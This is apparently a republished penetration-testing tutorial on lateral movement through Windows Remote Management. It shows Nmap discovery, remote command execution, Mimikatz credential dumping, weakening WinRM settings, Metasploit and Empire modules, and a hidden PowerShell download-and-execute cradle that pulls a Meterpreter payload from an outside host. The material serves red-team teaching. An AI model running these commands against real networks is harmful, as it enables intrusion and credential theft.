stands for Windows Remote Management and is a service that allows administrators to perform management tasks on systems remotely. Communication is performed via HTTP (5985) or HTTPS SOAP (5986) and support Kerberos and NTLM authentication by default and Basic authentication. Usage of this service requires administrator level credentials.

In a red team scenario if local administrator access has been achieved then these credentials can be used for lateral movement inside the network if  WinRM is used for management of servers.

Discovery

Hosts with port 5985 open have the WinRM service running. A simple Nmap scan can be used to determine these hosts.

nmap -p 5985 -sV .0.0.2 .0.0.1
WinRM - Port Discovery  - winrm port discovery - Lateral Movement – WinRM | Penetration Testing Lab

WinRM – Port Discovery

If port 5985 is open but port 5986 is closed this means that the WinRM service is configured to accept connections over HTTP only and encryption is not enabled.

WinRM - Ports  - winrm ports - Lateral Movement – WinRM | Penetration Testing Lab

WinRM – Ports

From a system that has already local administrator access and these privileges are shared with the target system the PowerShell Invoke-Command can be used for command execution over the WinRM service.

Invoke-Command -ComputerName TARGET -ScriptBlock { dir c: }
WinRM - Command Execution  - winrm command execution - Lateral Movement – WinRM | Penetration Testing Lab

WinRM – Command Execution

Mimikatz can also executed remotely for retrieval of credentials stored in memory and without dropping any binary into disk.

Import-Module ./Invoke-Mimikatz.ps1
Invoke-Mimikatz -ComputerName TARGET
WinRM - Mimikatz  - winrm mimikatz - Lateral Movement – WinRM | Penetration Testing Lab

WinRM – Mimikatz

These credentials can then be used to access other systems which can lead possibly to domain escalation.

For systems that don’t run WinRM it is possible to enable and configure this service for persistence by using a legitimate Windows service. The following command will enable WinRM.

Enable-PSRemoting -Force
WinRM - Enable the Service  - winrm enable the service - Lateral Movement – WinRM | Penetration Testing Lab

WinRM – Enable the Service

By default it might not be possible to connect to another system over WinRM and additional configuration might needed. The following commands will assist to configure the service properly for HTTP access from any host.

winrm quickconfig
winrm set winrm/config/Client @{AllowUnencrypted = "true"}
Set-Item WSMan:localhostclienttrustedhosts -value *

Dave Hardy has written a great post about PowerShell PSRemoting Pwnage which contains additional commands. Alternatively WinRM can be configured from the Local Group Policy.

WinRM - Local Group Policy  - winrm local group policy - Lateral Movement – WinRM | Penetration Testing Lab

WinRM – Local Group Policy

WinRS

Windows Remote Shell (WinRS) is a command line that is part of Windows 2008 and later. If WinRM is enabled this utility can be used to execute commands on a host remotely. The cmd argument will establish a new shell over command prompt.

winrs -r:http://WIN-2NE38K15TGH/wsman "cmd"
WinRS - CMD  - winrs cmd - Lateral Movement – WinRM | Penetration Testing Lab

WinRS – CMD

Alternatively instead of a shell command prompt commands can be executed in order to perform a silent recon on the target.

winrs -r:http://WIN-2NE38K15TGH/wsman "net localgroup administrators"
WinRS - Command Execution  - winrs command execution - Lateral Movement – WinRM | Penetration Testing Lab

WinRS – Command Execution

It is also possible to upgrade the Windows Remote Shell access to a Meterpreter session via the Metasploit web delivery module. The module will generate a payload which will be hosted locally and will generate the PowerShell command that needs to be executed on the target.

use multi/script/web_delivery
WinRS - Metasploit Web Delivery  - winrs metasploit web delivery - Lateral Movement – WinRM | Penetration Testing Lab

WinRS – Metasploit Web Delivery

Executing the PowerShell command from a system that is already connected via WinRS will download and execute the arbitrary code.

powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$h=new-object net.webclient;$h.proxy=[Net.WebRequest]::GetSystemWebProxy();$h.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $h.downloadstring('https://10.0.0.3:8080/4WM88bQsuZS');
WinRS - Execute PowerShell Command  - winrs execute powershell command - Lateral Movement – WinRM | Penetration Testing Lab

WinRS – Execute PowerShell Command

A Meterpreter session will open which will provide more flexibility in regards to post exploitation activities.

WinRS - Metasploit Meterpreter  - winrs metasploit meterpreter - Lateral Movement – WinRM | Penetration Testing Lab

WinRS – Metasploit Meterpreter

Interaction with the new system can be achieved with the command sessions and the associated session number.

WinRS - Meterpreter Session  - winrs meterpreter session - Lateral Movement – WinRM | Penetration Testing Lab

WinRS – Meterpreter Session

Metasploit

Metasploit Framework has several modules which can be utilized for the discovery of hosts that have the WinRM service enabled, discovery of credentials for service authentication and for executing arbitrary commands and code. The following module can discover systems with WinRM service enabled and their supporting authentication protocols.

auxiliary/scanner/winrm/winrm_auth_methods
Metasploit - WinRM Auth Methods  - metasploit winrm auth methods - Lateral Movement – WinRM | Penetration Testing Lab

Metasploit – WinRM Auth Methods

If local administrator credentials have been obtained then these credentials can be used to authenticate with other hosts via the WinRM service. The following module can determine if local administrator credentials are valid for other systems.

auxiliary/scanner/winrm/winrm_login 
Metasploit - WinRM Discovery of Credentials  - metasploit winrm discovery of credentials - Lateral Movement – WinRM | Penetration Testing Lab

Metasploit – WinRM Discovery of Credentials

Metasploit has also a module which can execute arbitrary commands over the WinRM service. This module requires local administrator credentials, the domain and the target host.

auxiliary/scanner/winrm/winrm_cmd
Metasploit - WinRM Command Execution  - metasploit winrm command execution - Lateral Movement – WinRM | Penetration Testing Lab

Metasploit – WinRM Command Execution

The output of the command will be returned:

Metasploit - WinRM Command Output  - metasploit winrm command output - Lateral Movement – WinRM | Penetration Testing Lab

Metasploit – WinRM Command Output

Arbitrary code execution is also possible over WinRM and the following module. The module requires local administrator credentials and the list of hosts that the code will executed. This module can be used for lateral movement purposes into hosts that share the same local administrator account.

/windows/winrm/winrm_script_exec
Metasploit - WinRM Code Execution Module Configuration  - metasploit winrm code execution module configuration - Lateral Movement – WinRM | Penetration Testing Lab

Metasploit – WinRM Code Execution Module Configuration

Upon exploitation the module will attempt to modify the PowerShell execution policy to allow execution of unsigned scripts. Then a PowerShell script will be written into disk and executed automatically in order to return a Meterpreter session. The module will also attempt to migrate into a SYSTEM level process to avoid loss of the shell due to time limit restriction of WinRS.

Metasploit - WinRM Code Execution  - metasploit winrm code execution - Lateral Movement – WinRM | Penetration Testing Lab

Metasploit – WinRM Code Execution

Empire

For engagements that utilize Empire there is a PowerShell module which can execute code remotely over WinRM in order to expand access inside a network. Requirements for usage of this module are: local administrator credentials, a listener, an agent and a target host.

usemodule lateral_movement/invoke_psremoting 
Empire - PSRemoting  - empire psremoting - Lateral Movement – WinRM | Penetration Testing Lab

Empire – PSRemoting

The list of active agents can be retrieved with the command agents. The following command will interact with the new agent X5DACN91.

interact
Empire - List of Agents  - empire list of agents - Lateral Movement – WinRM | Penetration Testing Lab

Empire – List of Agents

Post exploitation commands can be executed on the host that has been compromised through the WinRM service.

Empire - Command Execution via WinRM  - empire command execution via winrm - Lateral Movement – WinRM | Penetration Testing Lab

Empire – Command Execution via WinRM

References

 





Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here